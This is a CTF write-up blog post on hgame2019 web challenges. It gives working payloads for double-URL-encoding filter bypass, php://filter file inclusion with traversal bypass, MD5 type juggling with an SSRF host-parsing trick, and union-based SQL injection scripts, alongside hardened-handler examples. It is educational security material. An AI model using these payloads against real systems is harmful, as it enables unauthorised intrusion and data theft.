醉梦半醒的博客

hgame2019: selected web write-ups

2019/02/22

Level - Week 1

Who ate my flag:
The challenge hint points to a leaked Vim swap file. Download it and let Vim rebuild the unsaved buffer from it (vim -r expects a local swap file, not a URL):
curl -sO http://118.25.111.31:10086/.index.html.swp
vim -r .index.html.swp
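Checking for this class of leak generically, as an added example that is not part of the original write-up: the script below builds the swap/backup names that Vim and Emacs leave beside a file, probes each one through a pluggable fetcher, and flags bodies that carry the b0VIM block-0 magic. The candidate list and the offline fake responses are constructed for the example; the hypothetical http_fetch() is the drop-in for a live target.

```python
import posixpath
from typing import Callable

VIM_SWAP_MAGIC = b"b0VIM"   # every Vim swap file starts with this block-0 id


def editor_artifact_candidates(path: str) -> list[str]:
    """Names editors leave beside `path` that a web server will happily serve."""
    directory, name = posixpath.split(path)
    names = [
        f".{name}.swp", f".{name}.swo", f".{name}.swn",   # Vim swap files (crash / unsaved)
        f".{name}.un~",                                    # Vim persistent undo
        f"{name}~",                                        # Vim / Emacs backup copy
        f"#{name}#",                                       # Emacs auto-save
        f"{name}.bak", f"{name}.orig", f"{name}.save",     # common manual backups
    ]
    return [posixpath.join(directory, n) for n in names]


def looks_like_vim_swap(body: bytes) -> bool:
    return body.startswith(VIM_SWAP_MAGIC)


def probe_editor_leaks(base_url: str, path: str,
                       fetch: Callable[[str], tuple[int, bytes]]) -> list[tuple[str, bool]]:
    """Try every candidate; return (url, is_vim_swap) for each 200 with a body."""
    found = []
    for cand in editor_artifact_candidates(path):
        url = base_url.rstrip("/") + cand
        status, body = fetch(url)
        if status == 200 and body:
            found.append((url, looks_like_vim_swap(body)))
    return found


def http_fetch(url: str) -> tuple[int, bytes]:
    """Real fetcher for a live target (needs `requests`); swap in for fake_fetch below."""
    import requests
    r = requests.get(url, timeout=10)
    return r.status_code, r.content


# Constructed stand-in for the CTF host so the script runs offline.
FAKE_SITE = {
    "http://118.25.111.31:10086/.index.html.swp": (200, b"b0VIM 8.1\x00" + b"\x00" * 64),
    "http://118.25.111.31:10086/index.html~": (404, b"Not Found"),
}


def fake_fetch(url: str) -> tuple[int, bytes]:
    return FAKE_SITE.get(url, (404, b""))


if __name__ == "__main__":
    for url, is_swap in probe_editor_leaks("http://118.25.111.31:10086", "/index.html", fake_fetch):
        print(url, "(vim swap file)" if is_swap else "")
```

A hit that carries the b0VIM magic is worth recovering with vim -r; the other names are plain copies of the source and can be read directly.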

Header-swapping battle:

very easy web:
Double URL-encoding bypass. The filter inspects the parameter after one decode, but the application decodes it again, so %2576%2569%2564%2561%2572 (which decodes to %76%69%64%61%72 and then to vidar) reaches the application without tripping the filter:
http://120.78.184.111:8080/week1/very_ez/index.php?id=%2576%2569%2564%2561%2572
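How the bypass works, as an added example rather than code from the original post: a vulnerable handler checks the once-decoded value and then decodes a second time, while the hardened one decodes exactly once and rejects input that still contains percent-escapes. The blocked keyword vidar and the handler shapes are assumptions about the challenge's filter, which the write-up does not show.

```python
from urllib.parse import quote, unquote

BLOCKED = ("vidar",)          # assumed keyword the challenge's filter rejects


def encode_every_byte(s: str) -> str:
    """Percent-encode every byte, not just the reserved ones quote() would."""
    return "".join(f"%{b:02X}" for b in s.encode())


def double_encode(s: str) -> str:
    """Second layer: quote() turns each '%' of the first layer into '%25'."""
    return quote(encode_every_byte(s), safe="")


def is_blocked(value: str) -> bool:
    return any(word in value.lower() for word in BLOCKED)


def vulnerable_handler(raw_id: str) -> str:
    """Filter checks the once-decoded parameter; the app then decodes again."""
    once = unquote(raw_id)        # what the web server hands to the script
    if is_blocked(once):
        return "blocked"
    value = unquote(once)         # the second decode is the bug
    return f"lookup({value})"


def hardened_handler(raw_id: str) -> str:
    """Decode once, then refuse input that still carries percent-escapes."""
    value = unquote(raw_id)
    if "%" in value and unquote(value) != value:
        return "blocked: nested encoding"
    if is_blocked(value):
        return "blocked"
    return f"lookup({value})"


if __name__ == "__main__":
    payload = double_encode("vidar")
    print(payload)                         # the id= value used in the write-up
    print(vulnerable_handler(payload), "|", hardened_handler(payload))
```

The hardened check is the same idea as normalising before validating: whatever the validator sees must be exactly what the consumer sees.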

can u find me?:

Level - Week 2

easy_php:
Local file inclusion through the php://filter wrapper. Base64-encoding the output returns the file's source instead of executing it, and the ....// form survives a single non-recursive strip of ../ (one pass leaves ../ behind):
http://118.24.25.25:9999/easyphp/img/index.php?img=php://filter/read=convert.base64-encode/resource=....//flag
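The filter bypass and the fix that would have stopped it, as an added example and not the challenge's own code. strip_traversal_once() models a single str_replace('../', '') pass, which is what the ....// payload defeats; resolve_under_root() is the canonicalise-then-check approach that catches it regardless. The WEBROOT path is assumed.

```python
import base64
import posixpath
from typing import Optional

WEBROOT = "/var/www/html/img"       # assumed document root the include is relative to


def strip_traversal_once(path: str) -> str:
    """The filter the challenge appears to use: one non-recursive str_replace('../', '')."""
    return path.replace("../", "")


def strip_traversal_recursive(path: str) -> str:
    """Repeating the strip closes this particular hole, but is still a blacklist."""
    while "../" in path:
        path = path.replace("../", "")
    return path


def resolve_under_root(user_path: str, root: str = WEBROOT) -> Optional[str]:
    """Canonicalise and refuse anything that leaves `root` (the real fix)."""
    full = posixpath.normpath(posixpath.join(root, user_path))
    if full == root or full.startswith(root + "/"):
        return full
    return None


def decode_filter_output(body: str) -> str:
    """php://filter/read=convert.base64-encode returns the file as base64 text."""
    return base64.b64decode(body).decode()


if __name__ == "__main__":
    payload = "....//flag"
    print(strip_traversal_once(payload))          # ../flag: the filter only made it shorter
    print(resolve_under_root(strip_traversal_once(payload)))   # None: rejected after canonicalising
```

The same trick works with ..././, since one pass removes the inner ../ and the outer dots and slash close up around it.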

some php tricks:
MD5 weak-type comparison plus SSRF. str1=240610708 and str2=s878926199a have different digests that both start with 0e followed only by digits, so PHP's loose == reads them as the number 0 and they compare equal; str3[] and str4[] are arrays, for which md5() returns NULL, so the strict === check passes too; H.game[] (PHP stores it as H_game, since dots in parameter names become underscores) satisfies a further check the write-up does not detail. The url parameter then exploits a host-parsing discrepancy: parse_url() takes the host after the last @ (www.baidu.com) for the whitelist check, while the fetcher connects to 127.0.0.1 and reads admin.php's source through the php://filter wrapper.
http://118.24.3.214:3001/?str1=240610708&str2=s878926199a&str3[]=240610708&str4[]=s878926199a&H.game[]=10000e&url=http://@127.0.0.1:80@www.baidu.com/admin.php?filename=php://filter/read=convert.base64-encode/resource=flag.php
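Both halves of the payload checked offline, as an added example that is not the challenge's PHP. php_loose_eq() and php_strict_md5_eq() are models of the two PHP comparisons, limited to the cases the payload uses; host_seen_by_check() relies on urlsplit() splitting userinfo at the last @ exactly as parse_url() does, and host_seen_by_fetcher() is a model of a fetcher that stops at the first @, which is the behaviour this bypass depends on.

```python
import hashlib
import re
from urllib.parse import urlsplit

ZERO_E = re.compile(r"^0e\d+$")   # "0e" followed only by digits: PHP reads it as 0.0


def md5hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def php_loose_eq(a: str, b: str) -> bool:
    """Model of PHP '==' for two strings of the form 0e<digits>: both are numeric
    strings, so PHP compares them as floats and 0.0 == 0.0. Everything else: exact."""
    if ZERO_E.match(a) and ZERO_E.match(b):
        return float(a) == float(b)
    return a == b


def php_strict_md5_eq(a, b) -> bool:
    """Model of md5($a) === md5($b): md5() of an array is NULL (with a warning),
    and NULL === NULL is true, which is why str3[] and str4[] pass the strict check."""
    if isinstance(a, list) and isinstance(b, list):
        return True
    if isinstance(a, list) or isinstance(b, list):
        return False
    return md5hex(a) == md5hex(b)


def host_seen_by_check(url: str) -> str:
    """urlsplit() ends userinfo at the LAST '@', like PHP's parse_url()."""
    return urlsplit(url).hostname or ""


def host_seen_by_fetcher(url: str) -> str:
    """Model of a fetcher that ends userinfo at the FIRST '@' (assumed behaviour)."""
    netloc = urlsplit(url).netloc
    rest = netloc.split("@", 1)[1] if "@" in netloc else netloc
    return re.split(r"[:@/]", rest, 1)[0]


if __name__ == "__main__":
    a, b = md5hex("240610708"), md5hex("s878926199a")
    print(a, b, php_loose_eq(a, b))                 # two 0e... digests, loosely equal
    print(php_strict_md5_eq(["240610708"], ["s878926199a"]))
    url = "http://@127.0.0.1:80@www.baidu.com/admin.php"
    print(host_seen_by_check(url), "vs", host_seen_by_fetcher(url))
```

The defence on the PHP side is === with hash_equals() on strings only (reject arrays), and on the SSRF side resolving the URL with the same library that performs the request, then checking the resolved address rather than the hostname.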

baby-spider:

1. Without spoofed request headers, the tenth POST is answered with a shutdown code.

2. CSS styling means the text the crawler fetches is not the question actually displayed.

```python
import requests
import re
import sys

# Browser-like headers: without them the server cuts the session off on the tenth POST
header = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit 537.36 (KHTML, like Gecko) Chrome",
    "Accept": "text/html,application/xhtml+xml,application/xml; q=0.9,image/webp,*/*;q=0.8",
}
url1 = "http://111.231.140.29:10000"
session = requests.Session()
data1 = {
    'token': 'PBbMpC54RK0j4s5eZhakGwBQN5Yz7DOV'
}
r1 = session.post(url1, data=data1)

# Fetch the first question. The HTML tags that originally bracketed the capture
# group were lost when the post was published; restore them to match the page's
# markup before running this.
url2 = "http://111.231.140.29:10000/question"
r2 = session.get(url2)
demo = r2.text
rst1 = re.search('(.+?)', demo)
if not rst1:
    sys.exit("question not found in page")
# The question is an arithmetic expression; [:-2] drops its trailing characters.
# eval() on server-supplied text is only acceptable against this CTF target.
go = eval(rst1.group(1)[:-2])

url3 = "http://111.231.140.29:10000/solution"
demo2 = ""
for i in range(10):
    data2 = {
        'answer': go
    }
    r3 = session.post(url3, headers=header, data=data2)
    demo2 = r3.text
    rst3 = re.search('(.+?)', demo2)
    if rst3:
        go = eval(rst3.group(1)[:-2])
print(demo2)
print(go)
dataflag = {
    'answer': go
}
flag = session.post(url3, headers=header, data=dataflag)
print(flag.text)
```

Partial solution; the second bypass (the CSS decoy) is not finished.
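One way to attack the second bypass, added here as an example and not part of the original solution: parse the question page the way a browser would, keeping only text that is not inside a hidden element, and evaluate the arithmetic with a restricted AST walker instead of eval(). It assumes the decoys are hidden with inline display:none / visibility:hidden or one of the class names in HIDDEN_CLASSES, since the post does not say which CSS trick the challenge uses; the SAMPLE page is constructed.

```python
import ast
import operator
from html.parser import HTMLParser

# Assumption: decoys are hidden inline or with one of these class names.
HIDDEN_CLASSES = {"hide", "hidden"}
VOID_TAGS = {"br", "img", "input", "hr", "meta", "link"}   # never get a closing tag


class VisibleText(HTMLParser):
    """Collect only the text a browser would actually render."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.stack = []          # one bool per open element: is it hidden?
        self.hidden_depth = 0
        self.parts = []

    @staticmethod
    def _is_hidden(attrs) -> bool:
        a = dict(attrs)
        style = (a.get("style") or "").replace(" ", "").lower()
        classes = set((a.get("class") or "").split())
        return ("display:none" in style or "visibility:hidden" in style
                or bool(classes & HIDDEN_CLASSES))

    def handle_starttag(self, tag, attrs):
        if tag in VOID_TAGS:
            return
        hidden = self._is_hidden(attrs)
        self.stack.append(hidden)
        self.hidden_depth += hidden

    def handle_endtag(self, tag):
        if tag in VOID_TAGS or not self.stack:
            return
        self.hidden_depth -= self.stack.pop()

    def handle_data(self, data):
        if self.hidden_depth == 0:
            self.parts.append(data)


def visible_text(html: str) -> str:
    parser = VisibleText()
    parser.feed(html)
    parser.close()
    return " ".join("".join(parser.parts).split())


# Restricted replacement for eval(): arithmetic on numeric literals only.
OPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul,
       ast.Div: operator.truediv, ast.FloorDiv: operator.floordiv,
       ast.Mod: operator.mod, ast.USub: operator.neg}


def safe_arith(expr: str):
    def ev(node):
        if isinstance(node, ast.Expression):
            return ev(node.body)
        if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in OPS:
            return OPS[type(node.op)](ev(node.left), ev(node.right))
        if isinstance(node, ast.UnaryOp) and type(node.op) in OPS:
            return OPS[type(node.op)](ev(node.operand))
        raise ValueError(f"unsupported syntax: {ast.dump(node)}")
    return ev(ast.parse(expr.strip(), mode="eval"))


def is_safe_expression(expr: str) -> bool:
    try:
        safe_arith(expr)
        return True
    except (ValueError, SyntaxError):
        return False


def solve_question(html: str):
    """Visible text looks like '3 + 4 = ?'; evaluate the part before '='."""
    expr = visible_text(html).split("=", 1)[0]
    return safe_arith(expr)


# Constructed sample page: two decoys that a regex-based scraper would pick up.
SAMPLE = ('<div id="question"><span style="display: none">9 * 9</span>'
          '3 + 4<span class="hide"> + 100</span> = ?</div>')

if __name__ == "__main__":
    print(visible_text(SAMPLE), "->", solve_question(SAMPLE))
```

Decoys placed with an external stylesheet or positioned off-screen need the relevant selectors added to the hidden test; the parser structure stays the same.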

Level - Week 3

sqli-1:

```python
import requests
import hashlib

url = "http://118.89.111.179:3000"
cookie = {'PHPSESSID': 'bcsjkikm26hfpfq502ogcklf6d'}


def getcode():
    # Every query must carry a proof of work: a number whose md5 starts with the
    # 4 hex characters the page shows. The slice assumes the code sits at a fixed
    # offset near the end of the response body.
    rlt = requests.get(url, cookies=cookie)
    print(rlt.text)
    code = rlt.text[-18:-14]
    for i in range(0, 9999999):
        if hashlib.md5(str(i).encode()).hexdigest()[0:4] == code:
            answer = str(i)
            print(answer)
            return answer
    raise RuntimeError("no md5 preimage found for prefix " + code)


def sqlcode(go):
    answer = getcode()
    # Send the query through params= so '#' is percent-encoded; in a raw URL
    # string it would be treated as the fragment and never reach the server.
    r = requests.get(url + "/", params={"code": answer, "id": go}, cookies=cookie)
    print(r.url)
    print(r.text)


# Enumerate step by step: database name, table names, column name, then the flag
a = "1 union select database()#"
# get the database name
b = "1 union select group_concat(table_name) from information_schema.tables where table_schema='hgame'#"
# get the table names
c = "1 union select (select column_name from information_schema.columns where table_schema='hgame' and table_name='f1l1l1l1g' limit 0,1)#"
# get the column name
d = "1 union select f14444444g from hgame.f1l1l1l1g"
sqlcode(d)
```
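The challenge/proof-of-work/query exchange in a reusable form, as an added example rather than the write-up's script: solve_md5_prefix() is the brute force, extract_challenge() pulls the 4-hex code with a regex (the "code: abcd" markup is an assumption; the script above slices a fixed offset instead), and inject() does one full round trip through a pluggable fetcher. FakeServer is a constructed stand-in that validates the proof exactly as the target does, so the exchange runs offline; requests_fetch() is the drop-in for the live host.

```python
import hashlib
import re
from typing import Callable, Dict

# Assumed page markup: the challenge appears as "code: abcd". Adapt to the real page.
CHALLENGE_RE = re.compile(r"\bcode[:=]\s*([0-9a-f]{4})\b")

Fetch = Callable[[str, Dict[str, str], Dict[str, str]], str]   # (url, params, cookies) -> body


def solve_md5_prefix(prefix: str, limit: int = 10_000_000) -> str:
    """Smallest decimal string whose md5 hex digest starts with `prefix`."""
    for i in range(limit):
        cand = str(i)
        if hashlib.md5(cand.encode()).hexdigest().startswith(prefix):
            return cand
    raise RuntimeError(f"no preimage below {limit} for prefix {prefix!r}")


def extract_challenge(html: str) -> str:
    m = CHALLENGE_RE.search(html)
    if not m:
        raise ValueError("challenge not found; adjust CHALLENGE_RE to the page markup")
    return m.group(1)


def inject(base_url: str, payload: str, fetch: Fetch, cookies: Dict[str, str]) -> str:
    """One round trip: read the challenge, solve it, send the injection with the proof."""
    code = extract_challenge(fetch(base_url, {}, cookies))
    proof = solve_md5_prefix(code)
    return fetch(base_url, {"code": proof, "id": payload}, cookies)


# The enumeration ladder from the script above, in order.
LADDER = [
    "1 union select database()#",
    "1 union select group_concat(table_name) from information_schema.tables where table_schema='hgame'#",
    "1 union select (select column_name from information_schema.columns where table_schema='hgame' and table_name='f1l1l1l1g' limit 0,1)#",
    "1 union select f14444444g from hgame.f1l1l1l1g",
]


def requests_fetch(url: str, params: Dict[str, str], cookies: Dict[str, str]) -> str:
    """Real fetcher for the live target (needs `requests`); params= percent-encodes '#'."""
    import requests
    return requests.get(url, params=params, cookies=cookies, timeout=10).text


class FakeServer:
    """Constructed stand-in for the challenge host: issues a 4-hex challenge and
    checks the proof of work before answering any id."""

    def __init__(self, challenge: str = "cfcd"):
        self.challenge = challenge
        self.accepted = 0

    def fetch(self, url: str, params: Dict[str, str], cookies: Dict[str, str]) -> str:
        if "code" not in params:
            return f"<p>code: {self.challenge}</p>"
        if not hashlib.md5(params["code"].encode()).hexdigest().startswith(self.challenge):
            return "bad code"
        self.accepted += 1
        return f"result for {params['id']!r}: hgame"


if __name__ == "__main__":
    server = FakeServer()
    for payload in LADDER:
        print(inject("http://118.89.111.179:3000/", payload, server.fetch, {}))
```

A 4-hex prefix needs on average 65536 md5 calls, so a fresh proof per query is cheap; the point of the captcha is only to keep naive sqlmap runs from working without a tamper script.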